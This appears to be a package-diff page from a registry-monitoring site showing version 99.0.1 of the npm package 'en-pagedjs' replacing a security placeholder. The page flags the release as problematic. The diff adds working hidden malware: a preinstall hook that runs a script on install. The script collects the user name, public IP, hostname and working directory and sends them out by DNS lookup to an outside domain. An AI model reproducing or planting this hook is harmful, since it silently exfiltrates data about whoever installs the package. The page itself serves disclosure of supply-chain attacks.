en-pagedjs 0.0.1-security → 99.0.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of en-pagedjs might be problematic. Click here for more details.

package/index.js ADDED
File without changes
package/package.json CHANGED
@@ -1,6 +1,13 @@
1
1
  {
2
2
  "name": "en-pagedjs",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "99.0.1",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall" : "sh ./test.sh",
8
+ "test": "echo \"Error: no test specified\" && exit 1"
9
+ },
10
+ "keywords": [],
11
+ "author": "",
12
+ "license": "ISC"
6
13
  }
package/test.sh ADDED
@@ -0,0 +1,5 @@
1
+ IP="$(dig +short txt ch whoami.cloudflare @1.0.0.1)"
2
+ STE="${USER}-${IP}-@${HOSTNAME}-${PWD}"
3
+ echo $STE
4
+ nslookup $STE.evernote.steve.kiluilo.site
5
+ exit 0
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=en-pagedjs for more information.